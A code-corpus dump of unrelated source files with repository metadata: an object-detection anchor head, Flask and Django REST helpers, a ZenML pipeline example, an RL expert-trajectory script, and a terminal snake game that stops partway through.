- Sampled (9) pairs for target assignment. (approxes)
- The square boxes where the predicted anchors are based on.
(squares)
- Guided anchors.
Please refer to https://arxiv.org/abs/1901.03278 for more details.
Args:
num_classes (int): Number of classes.
in_channels (int): Number of channels in the input feature map.
feat_channels (int): Number of channels of the feature map.
octave_base_scale (int): Base octave scale of each level of
feature map.
scales_per_octave (int): Number of octave scales in each level of
feature map
octave_ratios (Iterable): octave aspect ratios.
anchor_strides (Iterable): Anchor strides.
anchor_base_sizes (Iterable): Anchor base sizes.
anchoring_means (Iterable): Mean values of anchoring targets.
anchoring_stds (Iterable): Std values of anchoring targets.
target_means (Iterable): Mean values of regression targets.
target_stds (Iterable): Std values of regression targets.
deformable_groups: (int): Group number of DCN in
FeatureAdaption module.
loc_filter_thr (float): Threshold to filter out unconcerned regions.
loss_loc (dict): Config of location loss.
loss_shape (dict): Config of anchor shape loss.
loss_cls (dict): Config of classification loss.
loss_bbox (dict): Config of bbox regression loss.
"""
def __init__(
self,
num_classes,
in_channels,
feat_channels=256,
octave_base_scale=8,
scales_per_octave=3,
octave_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
anchor_base_sizes=None,
anchoring_means=(.0, .0, .0, .0),
anchoring_stds=(1.0, 1.0, 1.0, 1.0),
target_means=(.0, .0, .0, .0),
target_stds=(1.0, 1.0, 1.0, 1.0),
deformable_groups=4,
loc_filter_thr=0.01,
loss_loc=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_shape=dict(type='BoundedIoULoss', beta=0.2, loss_weight=1.0),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0,
loss_weight=1.0)): # yapf: disable
super(AnchorHead, self).__init__()
self.in_channels = in_channels
self.num_classes = num_classes
self.feat_channels = feat_channels
self.octave_base_scale = octave_base_scale
self.scales_per_octave = scales_per_octave
self.octave_scales = octave_base_scale * np.array(
[2**(i / scales_per_octave) for i in range(scales_per_octave)])
self.approxs_per_octave = len(self.octave_scales) * len(octave_ratios)
self.octave_ratios = octave_ratios
self.anchor_strides = anchor_strides
self.anchor_base_sizes = list(
anchor_strides) if anchor_base_sizes is None else anchor_base_sizes
self.anchoring_means = anchoring_means
self.anchoring_stds = anchoring_stds
self.target_means = target_means
self.target_stds = target_stds
self.deformable_groups = deformable_groups
self.loc_filter_thr = loc_filter_thr
self.approx_generators = []
self.square_generators = []
for anchor_base in self.anchor_base_sizes:
# Generators for approxs
self.approx_generators.append(
AnchorGenerator(anchor_base, self.octave_scales,
self.octave_ratios))
# Generators for squares
self.square_generators.append(
AnchorGenerator(anchor_base, [self.octave_base_scale], [1.0]))
# one anchor per location
self.num_anchors = 1
self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)
self.cls_focal_loss = loss_cls['type'] in ['FocalLoss']
self.loc_focal_loss = loss_loc['type'] in ['FocalLoss']
if self.use_sigmoid_cls:
self.cls_out_channels = self.num_classes - 1
else:
self.cls_out_channels = self.num_classes
# build losses
self.loss_loc = build_loss(loss_loc)
self.loss_shape = build_loss(loss_shape)
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.fp16_enabled = False
self._init_layers()
def _init_layers(self):
self.relu = nn.ReLU(inplace=True)
self.conv_loc = nn.Conv2d(self.feat_channels, 1, 1)
self.conv_shape = nn.Conv2d(self.feat_channels, self.num_anchors * 2,
1)
self.feature_adaption = FeatureAdaption(
self.feat_channels,
self.feat_channels,
kernel_size=3,
deformable_groups=self.deformable_groups)
self.conv_cls = MaskedConv2d(self.feat_channels,
self.num_anchors * self.cls_out_channels,
1)
self.conv_reg = MaskedConv2d(self.feat_channels, self.num_anchors * 4,
1)
def init_weights(self):
normal_init(self.conv_cls, std=0.01)
normal_init(self.conv_reg, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.conv_loc, std=0.01, bias=bias_cls)
normal_init(self.conv_shape, std=0.01)
self.feature_adaption.init_weights()
def forward_single(self, x):
loc_pred = self.conv_loc(x)
shape_pred = self.conv_shape(x)
x = self.feature_adaption(x, shape_pred)
# masked conv is only used during inference for speed-up
if not self.training:
mask = loc_pred.sigmoid()[0] >= self.loc_filter_thr
else:
mask = None
cls_score = self.conv_cls(x, mask)
bbox_pred = self.conv_reg(x, mask)
return cls_score, bbox_pred, shape_pred, loc_pred
def forward(self, feats):
return multi_apply(self.forward_single, feats)
def get_sampled_approxs(self,
featmap_sizes,
img_metas,
cfg,
device='cuda'):
"""Get sampled approxs and inside flags according to feature map sizes.
Args:
featmap_sizes (list[tuple]): Multi-level feature map sizes.
img_metas (list[dict]): Image meta info.
device (torch.device | str): device for returned tensors
Returns:
tuple: approxes of each image, inside flags of each image
"""
num_imgs = len(img_metas)
num_levels = len(featmap_sizes)
# since feature map sizes of all images are the same, we only compute
# approxes for one time
multi_level_approxs = []
for i in range(num_levels):
approxs = self.approx_generators[i].grid_anchors(
featmap_sizes[i], self.anchor_strides[i], device=device)
multi_level_approxs.append(approxs)
approxs_list = [multi_level_approxs for _ in range(num_imgs)]
# for each image, we compute inside flags of multi level approxes
inside_flag_list = []
for img_id, img_meta in enumerate(img_metas):
multi_level_flags = []
multi_level_approxs = approxs_list[img_id]
for i in range(num_levels):
approxs = multi_level_approxs[i]
anchor_stride = self.anchor_strides[i]
feat_h, feat_w = featmap_sizes[i]
h, w, _ = img_meta['pad_shape']
valid_feat_h = min(int(np.ceil(h / anchor_stride)), feat_h)
valid_feat_w = min(int(np.ceil(w / anchor_stride)), feat_w)
flags = self.approx_generators[i].valid_flags(
(feat_h, feat_w), (valid_feat_h, valid_feat_w),
device=device)
inside_flags_list = []
for i in range(self.approxs_per_octave):
split_valid_flags = flags[i::self.approxs_per_octave]
split_approxs = approxs[i::self.approxs_per_octave, :]
inside_flags = anchor_inside_flags(
split_approxs, split_valid_flags,
img_meta['img_shape'][:2], cfg.allowed_border)
inside_flags_list.append(inside_flags)
# inside_flag for a position is true if any anchor in this
# position is true
inside_flags = (
torch.stack(inside_flags_list, 0).sum(dim=0) > 0)
multi_level_flags.append(inside_flags)
inside_flag_list.append(multi_level_flags)
return approxs_list, inside_flag_list
def get_anchors(self,
featmap_sizes,
shape_preds,
loc_preds,
img_metas,
use_loc_filter=False,
device='cuda'):
"""Get squares according to feature map sizes and guided
anchors.
Args:
featmap_sizes (list[tuple]): Multi-level feature map sizes.
shape_preds (list[tensor]): Multi-level shape predictions.
loc_preds (list[tensor]): Multi-level location predictions.
img_metas (list[dict]): Image meta info.
use_loc_filter (bool): Use loc filter or not.
device (torch.device | str): device for returned tensors
Returns:
tuple: square approxs of each image, guided anchors of each image,
loc masks of each image
"""
num_imgs = len(img_metas)
num_levels = len(featmap_sizes)
# since feature map sizes of all images are the same, we only compute
# squares for one time
multi_level_squares = []
for i in range(num_levels):
squares = self.square_generators[i].grid_anchors(
featmap_sizes[i], self.anchor_strides[i], device=device)
multi_level_squares.append(squares)
squares_list = [multi_level_squares for _ in range(num_imgs)]
# for each image, we compute multi level guided anchors
guided_anchors_list = []
loc_mask_list = []
for img_id, img_meta in enumerate(img_metas):
multi_level_guided_anchors = []
multi_level_loc_mask = []
for i in range(num_levels):
squares = squares_list[img_id][i]
shape_pred = shape_preds[i][img_id]
loc_pred = loc_preds[i][img_id]
guided_anchors, loc_mask = self.get_guided_anchors_single(
squares,
shape_pred,
loc_pred,
use_loc_filter=use_loc_filter)
multi_level_guided_anchors.append(guided_anchors)
multi_level_loc_mask.append(loc_mask)
guided_anchors_list.append(multi_level_guided_anchors)
loc_mask_list.append(multi_level_loc_mask)
return squares_list, guided_anchors_list, loc_mask_list
def get_guided_anchors_single(self,
squares,
shape_pred,
loc_pred,
use_loc_filter=False):
"""Get guided anchors and loc masks for a single level.
Args:
square (tensor): Squares of a single level.
shape_pred (tensor): Shape predections of a single level.
loc_pred (tensor): Loc predections of a single level.
use_loc_filter (list[tensor]): Use loc filter or not.
Returns:
tuple: guided anchors, location masks
"""
# calculate location filtering mask
loc_pred = loc_pred.sigmoid().detach()
if use_loc_filter:
loc_mask = loc_pred >= self.loc_filter_thr
else:
loc_mask = loc_pred >= 0.0
mask = loc_mask.permute(1, 2, 0).expand(-1, -1, self.num_anchors)
mask = mask.contiguous().view(-1)
# calculate guided anchors
squares = squares[mask]
anchor_deltas = shape_pred.permute(1, 2, 0).contiguous().view(
-1, 2).detach()[mask]
bbox_deltas = anchor_deltas.new_full(squares.size(), 0)
bbox_deltas[:, 2:] = anchor_deltas
guided_anchors = delta2bbox(
squares,
bbox_deltas,
self.anchoring_means,
self.anchoring_stds,
wh_ratio_clip=1e-6)
return guided_anchors, mask
def loss_shape_single(self, shape_pred, bbox_anchors, bbox_gts,
anchor_weights, anchor_total_num):
shape_pred = shape_pred.permute(0, 2, 3, 1).contiguous().view(-1, 2)
bbox_anchors = bbox_anchors.contiguous().view(-1, 4)
bbox_gts = bbox_gts.contiguous().view(-1, 4)
anchor_weights = anchor_weights.contiguous().view(-1, 4)
bbox_deltas = bbox_anchors.new_full(bbox_anchors.size(), 0)
bbox_deltas[:, 2:] += shape_pred
# filter out negative samples to speed-up weighted_bounded_iou_loss
inds = torch.nonzero(anchor_weights[:, 0] > 0).squeeze(1)
bbox_deltas_ = bbox_deltas[inds]
bbox_anchors_ = bbox_anchors[inds]
bbox_gts_ = bbox_gts[inds]
anchor_weights_ = anchor_weights[inds]
pred_anchors_ = delta2bbox(
bbox_anchors_,
bbox_deltas_,
self.anchoring_means,
self.anchoring_stds,
wh_ratio_clip=1e-6)
loss_shape = self.loss_shape(
pred_anchors_,
bbox_gts_,
anchor_weights_,
avg_factor=anchor_total_num)
return loss_shape
def loss_loc_single(self, loc_pred, loc_target, loc_weight, loc_avg_factor,
cfg):
loss_loc = self.loss_loc(
loc_pred.reshape(-1, 1),
loc_target.reshape(-1, 1).long(),
loc_weight.reshape(-1, 1),
avg_factor=loc_avg_factor)
return loss_loc
@force_fp32(
apply_to=('cls_scores', 'bbox_preds', 'shape_preds', 'loc_preds'))
def loss(self,
cls_scores,
bbox_preds,
shape_preds,
loc_preds,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None):
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
assert len(featmap_sizes) == len(self.approx_generators)
device = cls_scores[0].device
# get loc targets
loc_targets, loc_weights, loc_avg_factor = ga_loc_target(
gt_bboxes,
featmap_sizes,
self.octave_base_scale,
self.anchor_strides,
center_ratio=cfg.center_ratio,
ignore_ratio=cfg.ignore_ratio)
# get sampled approxes
approxs_list, inside_flag_list = self.get_sampled_approxs(
featmap_sizes, img_metas, cfg, device=device)
# get squares and guided anchors
squares_list, guided_anchors_list, _ = self.get_anchors(
featmap_sizes, shape_preds, loc_preds, img_metas, device=device)
# get shape targets
sampling = False if not hasattr(cfg, 'ga_sampler') else True
shape_targets = ga_shape_target(
approxs_list,
inside_flag_list,
squares_list,
gt_bboxes,
img_metas,
self.approxs_per_octave,
cfg,
sampling=sampling)
if shape_targets is None:
return None
(bbox_anchors_list, bbox_gts_list, anchor_weights_list, anchor_fg_num,
anchor_bg_num) = shape_targets
anchor_total_num = (
anchor_fg_num if not sampling else anchor_fg_num + anchor_bg_num)
# get anchor targets
sampling = False if self.cls_focal_loss else True
label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1
cls_reg_targets = anchor_target(
guided_anchors_list,
inside_flag_list,
gt_bboxes,
img_metas,
self.target_means,
self.target_stds,
cfg,
gt_bboxes_ignore_list=gt_bboxes_ignore,
gt_labels_list=gt_labels,
label_channels=label_channels,
sampling=sampling)
if cls_reg_targets is None:
return None
(labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,
_, num_total_pos, num_total_neg) = cls_reg_targets
num_total_samples = (
num_total_pos if self.cls_focal_loss else num_total_pos +
num_total_neg)
# get classification and bbox regression losses
losses_cls, losses_bbox = multi_apply(
self.loss_single,
cls_scores,
bbox_preds,
labels_list,
label_weights_list,
bbox_targets_list,
bbox_weights_list,
num_total_samples=num_total_samples,
cfg=cfg)
# get anchor location loss
losses_loc = []
for i in range(len(loc_preds)):
loss_loc = self.loss_loc_single(
loc_preds[i],
loc_targets[i],
loc_weights[i],
loc_avg_factor=loc_avg_factor,
cfg=cfg)
losses_loc.append(loss_loc)
# get anchor shape loss
losses_shape = []
for i in range(len(shape_preds)):
loss_shape = self.loss_shape_single(
shape_preds[i],
bbox_anchors_list[i],
bbox_gts_list[i],
anchor_weights_list[i],
anchor_total_num=anchor_total_num)
losses_shape.append(loss_shape)
return dict(
loss_cls=losses_cls,
loss_bbox=losses_bbox,
loss_shape=losses_shape,
loss_loc=losses_loc)
@force_fp32(
apply_to=('cls_scores', 'bbox_preds', 'shape_preds', 'loc_preds'))
def get_bboxes(self,
cls_scores,
bbox_preds,
shape_preds,
loc_preds,
img_metas,
cfg,
rescale=False):
assert len(cls_scores) == len(bbox_preds) == len(shape_preds) == len(
loc_preds)
num_levels = len(cls_scores)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
device = cls_scores[0].device
# get guided anchors
_, guided_anchors, loc_masks = self.get_anchors(
featmap_sizes,
shape_preds,
loc_preds,
img_metas,
use_loc_filter=not self.training,
device=device)
result_list = []
for img_id in range(len(img_metas)):
cls_score_list = [
cls_scores[i][img_id].detach() for i in range(num_levels)
]
bbox_pred_list = [
bbox_preds[i][img_id].detach() for i in range(num_levels)
]
guided_anchor_list = [
guided_anchors[img_id][i].detach() for i in range(num_levels)
]
loc_mask_list = [
loc_masks[img_id][i].detach() for i in range(num_levels)
]
img_shape = img_metas[img_id]['img_shape']
scale_factor = img_metas[img_id]['scale_factor']
proposals = self.get_bboxes_single(cls_score_list, bbox_pred_list,
guided_anchor_list,
loc_mask_list, img_shape,
scale_factor, cfg, rescale)
result_list.append(proposals)
return result_list
def get_bboxes_single(self,
cls_scores,
bbox_preds,
mlvl_anchors,
mlvl_masks,
img_shape,
scale_factor,
cfg,
rescale=False):
assert len(cls_scores) == len(bbox_preds) == len(mlvl_anchors)
mlvl_bboxes = []
mlvl_scores = []
for cls_score, bbox_pred, anchors, mask in zip(cls_scores, bbox_preds,
mlvl_anchors,
mlvl_masks):
assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
# if no location is kept, end.
if mask.sum() == 0:
continue
# reshape scores and bbox_pred
cls_score = cls_score.permute(1, 2,
0).reshape(-1, self.cls_out_channels)
if self.use_sigmoid_cls:
scores = cls_score.sigmoid()
else:
scores = cls_score.softmax(-1)
bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4)
# filter scores, bbox_pred w.r.t. mask.
# anchors are filtered in get_anchors() beforehand.
scores = scores[mask, :]
bbox_pred = bbox_pred[mask, :]
if scores.dim() == 0:
anchors = anchors.unsqueeze(0)
scores = scores.unsqueeze(0)
bbox_pred = bbox_pred.unsqueeze(0)
# filter anchors, bbox_pred, scores w.r.t. scores
nms_pre = cfg.get('nms_pre', -1)
if nms_pre > 0 and scores.shape[0] > nms_pre:
if self.use_sigmoid_cls:
max_scores, _ = scores.max(dim=1)
else:
max_scores, _ = scores[:, 1:].max(dim=1)
_, topk_inds = max_scores.topk(nms_pre)
anchors = anchors[topk_inds, :]
bbox_pred = bbox_pred[topk_inds, :]
scores = scores[topk_inds, :]
bboxes = delta2bbox(anchors, bbox_pred, self.target_means,
self.target_stds, img_shape)
mlvl_bboxes.append(bboxes)
mlvl_scores.append(scores)
mlvl_bboxes = torch.cat(mlvl_bboxes)
if rescale:
mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)
mlvl_scores = torch.cat(mlvl_scores)
if self.use_sigmoid_cls:
padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)
mlvl_scores = torch.cat([padding, mlvl_scores], dim=1)
# multi class NMS
det_bboxes, det_labels = multiclass_nms(mlvl_bboxes, mlvl_scores,
cfg.score_thr, cfg.nms,
cfg.max_per_img)
return det_bboxes, det_labels
| 40.621188 | 79 | 0.581144 |
acdf9daf59adf03f901bb82eb2af2d26dc443ffd | 707 | py | Python | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 3 | 2019-08-12T13:46:13.000Z | 2020-03-20T08:09:16.000Z | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 7 | 2019-08-12T13:06:32.000Z | 2020-03-28T14:33:16.000Z | listthedocs/commands.py | dvd7587/listthedocs | b4734be11977ea971e0ad5fa2e9920cc63e54ec0 | [
"MIT"
] | 2 | 2019-09-26T14:31:09.000Z | 2019-10-01T08:49:47.000Z | import click
from flask.cli import with_appcontext
from .database import database
from .entities import Version, Project
@click.command('add_listthedocs')
@with_appcontext
def add_listthedocs_project():
project = database.get_project('list-the-docs')
if project is not None:
print('Project already exists')
return
project = Project(
title='List The Docs', description="Documentation of List The Docs", code='list-the-docs'
)
project = database.add_project(project)
print('Added project', project.title)
database.add_version(
project.code, Version('2.0.0', 'https://allebacco.github.io/listthedocs/')
)
print('Added version 2.0.0')
| 24.37931 | 97 | 0.697313 |
acdf9e2ab3ff4ca175712f256961372f619e18d8 | 700 | py | Python | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | 1 | 2022-02-13T13:51:13.000Z | 2022-02-13T13:51:13.000Z | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | from rest_framework import permissions
class OnlyCanSeeAdminUser(permissions.BasePermission):
def has_permission(self, request, view):
if view.action == "list":
if request.user.is_staff == True:
return True
else:
return False
else:
return super().has_permission(request, view)
class OnlyCanAcceptAdminUser(permissions.BasePermission):
def has_permission(self, request, view):
if view.action == "create":
if request.user.is_staff == True:
return True
else:
return False
else:
return super().has_permission(request, view)
| 29.166667 | 57 | 0.591429 |
acdf9e79b4674a8b39be66553e3dd0aef2352508 | 929 | py | Python | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | 2 | 2020-03-20T18:24:23.000Z | 2021-03-05T22:05:04.000Z | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | null | null | null | test/test_variable_name_value.py | dcompane/controlm_py | c521208be2f00303383bb32ca5eb2b7ff91999d3 | [
"MIT"
] | 1 | 2021-05-27T15:54:37.000Z | 2021-05-27T15:54:37.000Z | # coding: utf-8
"""
Control-M Services
Provides access to BMC Control-M Services # noqa: E501
OpenAPI spec version: 9.20.220
Contact: customer_support@bmc.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import controlm_py
from controlm_py.models.variable_name_value import VariableNameValue # noqa: E501
from controlm_py.rest import ApiException
class TestVariableNameValue(unittest.TestCase):
"""VariableNameValue unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testVariableNameValue(self):
"""Test VariableNameValue"""
# FIXME: construct object with mandatory attributes with example values
# model = controlm_py.models.variable_name_value.VariableNameValue() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.225 | 90 | 0.714747 |
acdf9f6a77d077d38ed2b7ebaa5a88f57bd76811 | 3,005 | py | Python | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | null | null | null | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | null | null | null | examples/gcp_dataflow/run.py | Camicb/zenml | 92788a76c7923a30612c5f5bdaaf5bb9554773a1 | [
"Apache-2.0"
] | 1 | 2020-12-27T08:16:42.000Z | 2020-12-27T08:16:42.000Z | from zenml.core.backends.processing.processing_dataflow_backend import \
ProcessingDataFlowBackend
from zenml.core.datasources.csv_datasource import CSVDatasource
from zenml.core.metadata.mysql_metadata_wrapper import MySQLMetadataStore
from zenml.core.pipelines.training_pipeline import TrainingPipeline
from zenml.core.repo.artifact_store import ArtifactStore
from zenml.core.steps.evaluator.tfma_evaluator import TFMAEvaluator
from zenml.core.steps.preprocesser.standard_preprocesser \
.standard_preprocesser import \
StandardPreprocesser
from zenml.core.steps.split.random_split import RandomSplit
from zenml.core.steps.trainer.feedforward_trainer import FeedForwardTrainer
artifact_store_path = 'gs://your-bucket-name/optional-subfolder'
project = 'PROJECT' # the project to launch the VM in
cloudsql_connection_name = f'{project}:REGION:INSTANCE'
mysql_db = 'DATABASE'
mysql_user = 'USERNAME'
mysql_pw = 'PASSWORD'
training_job_dir = artifact_store_path + '/gcaiptrainer/'
training_pipeline = TrainingPipeline(name='GCP Orchestrated')
# Add a datasource. This will automatically track and version it.
ds = CSVDatasource(name='Pima Indians Diabetes',
path='gs://zenml_quickstart/diabetes.csv')
training_pipeline.add_datasource(ds)
# Add a split
training_pipeline.add_split(RandomSplit(
split_map={'train': 0.7, 'eval': 0.3}))
# Add a preprocessing unit
training_pipeline.add_preprocesser(
StandardPreprocesser(
features=['times_pregnant', 'pgc', 'dbp', 'tst', 'insulin', 'bmi',
'pedigree', 'age'],
labels=['has_diabetes'],
overwrite={'has_diabetes': {
'transform': [{'method': 'no_transform', 'parameters': {}}]}}
))
# Add a trainer
training_pipeline.add_trainer(FeedForwardTrainer(
loss='binary_crossentropy',
last_activation='sigmoid',
output_units=1,
metrics=['accuracy'],
epochs=20))
# Add an evaluator
training_pipeline.add_evaluator(
TFMAEvaluator(slices=[['has_diabetes']],
metrics={'has_diabetes': ['binary_crossentropy',
'binary_accuracy']}))
# Run the pipeline locally but distribute the beam-compatible steps, i.e.,
# the Data, Statistics, Preprocessing and Evaluator Steps.
# Note: If any of these steps are non-standard, custom steps, then you need
# to build a new Docker image based on the ZenML Dataflow image, and pass that
# into the `image` parameter in the ProcessingDataFlowBackend
# Define the processing backend
processing_backend = ProcessingDataFlowBackend(project=project)
# Define the metadata store
metadata_store = MySQLMetadataStore(
host='127.0.0.1',
port=3306,
database=mysql_db,
username=mysql_user,
password=mysql_pw,
)
# Define the artifact store
artifact_store = ArtifactStore(artifact_store_path)
# Run the pipeline
training_pipeline.run(
backends=[processing_backend],
metadata_store=metadata_store,
artifact_store=artifact_store,
)
| 35.352941 | 78 | 0.746423 |
acdf9f93c41e3baa16e7f1e7066f90733cf6e00e | 125 | py | Python | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | 7 | 2019-06-25T16:54:08.000Z | 2021-12-22T08:12:08.000Z | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | null | null | null | src/wrappers/__init__.py | ondrejpudis/crop-yield-predictor | 061514bf51eca5b2abe0ae8e48e1f63478186890 | [
"MIT"
] | 3 | 2021-07-10T15:17:30.000Z | 2021-11-22T01:24:19.000Z | from .clusterer_wrapper import ClustererWrapper
from .crop_yield_dataset import CropYieldDataset, PredictionCropYieldDataset
| 41.666667 | 76 | 0.904 |
acdf9fe911a0422d6c9a187024e3bc7a3acdb095 | 3,123 | py | Python | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | 16 | 2020-04-29T03:25:41.000Z | 2022-03-22T02:19:38.000Z | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | null | null | null | expert/save_traj_ppo.py | hyyh28/SAIL | 125ad3e64eefcf532931f567b95a5320737851e9 | [
"MIT"
] | 4 | 2020-04-29T03:22:53.000Z | 2021-12-01T02:40:16.000Z | import argparse
import gym
import os
import sys
import pickle
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from itertools import count
from utils import *
parser = argparse.ArgumentParser(description='Save expert trajectory')
parser.add_argument('--env-name', default="Hopper-v2", metavar='G',
help='name of the environment to run')
parser.add_argument('--model-path', metavar='G',
help='name of the expert model')
parser.add_argument('--render', action='store_true', default=False,
help='render the environment')
parser.add_argument('--seed', type=int, default=1, metavar='N',
help='random seed (default: 1)')
parser.add_argument('--max-expert-state-num', type=int, default=50000, metavar='N',
help='maximal number of main iterations (default: 50000)')
parser.add_argument('--running-state', type=int, default=0)
args = parser.parse_args()
dtype = torch.float32
torch.set_default_dtype(dtype)
env = gym.make(args.env_name)
env.seed(args.seed)
torch.manual_seed(args.seed)
is_disc_action = len(env.action_space.shape) == 0
state_dim = env.observation_space.shape[0]
if args.running_state == 1:
print('use running state')
policy_net, _, running_state = pickle.load(open(args.model_path, "rb"))
else:
print('no running state')
policy_net, _ = pickle.load(open(args.model_path, "rb"))
expert_trajs = []
policy_net.to(dtype)
def main_loop():
num_steps = 0
for i_episode in count():
expert_traj = []
state = env.reset()
if args.running_state:
state = running_state(state)
reward_episode = 0
for t in range(10000):
state_var = tensor(state).unsqueeze(0).to(dtype)
# choose mean action
action = policy_net(state_var)[0][0].detach().numpy()
# choose stochastic action
# action = policy_net.select_action(state_var)[0].cpu().numpy()
action = int(action) if is_disc_action else action.astype(np.float64)
next_state, reward, done, _ = env.step(action)
if args.running_state:
next_state = running_state(next_state)
reward_episode += reward
num_steps += 1
expert_traj.append(np.hstack([state, action]))
if args.render:
env.render()
if done:
expert_traj = np.stack(expert_traj)
expert_trajs.append(expert_traj)
break
state = next_state
print('Episode {}\t reward: {:.2f}'.format(i_episode, reward_episode))
if num_steps >= args.max_expert_state_num:
break
main_loop()
if args.running_state:
pickle.dump((expert_trajs, running_state), open(os.path.join(assets_dir(), 'expert_traj/{}_expert_traj.p'.format(args.env_name)), \
'wb'))
else:
pickle.dump(expert_trajs, open(os.path.join(assets_dir(), 'expert_traj/{}_expert_traj.p'.format(args.env_name)),\
'wb'))
| 34.7 | 135 | 0.624079 |
acdfa18ac99bd4b48f1061eaf5cc36ce96e098c0 | 214 | py | Python | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | 1 | 2020-12-24T21:39:26.000Z | 2020-12-24T21:39:26.000Z | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | null | null | null | backend/everpro/everpro/__init__.py | Ascensiony/EverPro-Intelligence-APIs | 41de67418a7ed266547840948301225220ddd6c9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
# This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
__all__ = ("celery_app",)
| 26.75 | 54 | 0.785047 |
acdfa1c4a66e2310ae4437918196139c1c89a230 | 4,540 | py | Python | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | Python/snake.py | osbaldomartinez20/snake | 8f232626cd1714304996c76dc4f0e461b2c5f0ca | [
"MIT"
] | null | null | null | ##libraries used for the game
import random
import msvcrt
import time
##global variables
height = 0
width = 0
snakeBody = [(0,0)]
##directions, to go up you need to subtract
DIR = (0,0)
UP = (-1,0)
DOWN = (1,0)
RIGHT = (0, 1)
LEFT = (0,-1)
##the apple's location
location = (0,0)
##this is for displaying the objects in the game
EMPTY = 0
HEAD = 1
BODY = 2
APPLE = 3
DISPLAY_CHAR = {
EMPTY: " ",
HEAD: "X",
BODY: "0",
APPLE: "*",
}
##Used to compare with user input
INPUT_CHAR_UP = "W"
INPUT_CHAR_DOWN = "S"
INPUT_CHAR_LEFT = "A"
INPUT_CHAR_RIGHT = "D"
##function that initializes the game. Takes two parameters h and w, which represent height and width of game space.
def initGame(h, w) :
global height
global width
global UP
height = h
width = w
initSnake(UP)
##initializes the snake with a list of coordinates body and a direction dire
def initSnake(dire) :
global DIR
DIR = dire
##makes snake take a step
def takeStep(position) :
global snakeBody
temp = snakeBody[:]
for y in range(len(snakeBody)) :
if y == len(snakeBody)-1 :
snakeBody[y] = ((snakeBody[y][0] + position[0]) % height), ((snakeBody[y][1] + position[1]) % width)
else :
snakeBody[y] = ((temp[y+1][0])), ((temp[y+1][1]))
##extends the snake's body
def extendBody(position) :
global snakeBody
snakeBody.append(position)
##accepts a direction argument, and sets the argument as the snake’s direction
def setDirection(dire) :
global DIR
DIR = dire
##returns the position of the front of the snake’s body
def head() :
global snakeBody
return snakeBody[-1]
##function that initializes the apple location
def initApple(loc) :
global location
location = loc
##function that gives apple location
def appleLocation() :
while True:
apple_loc = (random.randint(0, height-1), random.randint(0, width-1))
if apple_loc not in snakeBody:
break
initApple(apple_loc)
##calculates the next move for the snake
def next_position(position, step):
return (
(position[0] + step[0]) % height,
(position[1] + step[1]) % width
)
##function creates the board for the game
def gameBoard() :
g_board = [[DISPLAY_CHAR[EMPTY] for _ in range(width)] for _ in range(height)]
#used to store snake's body in board
for y in range(len(snakeBody)) :
g_board[snakeBody[y][0]][snakeBody[y][1]] = DISPLAY_CHAR[BODY]
#used to store snake's head in board
h = head()
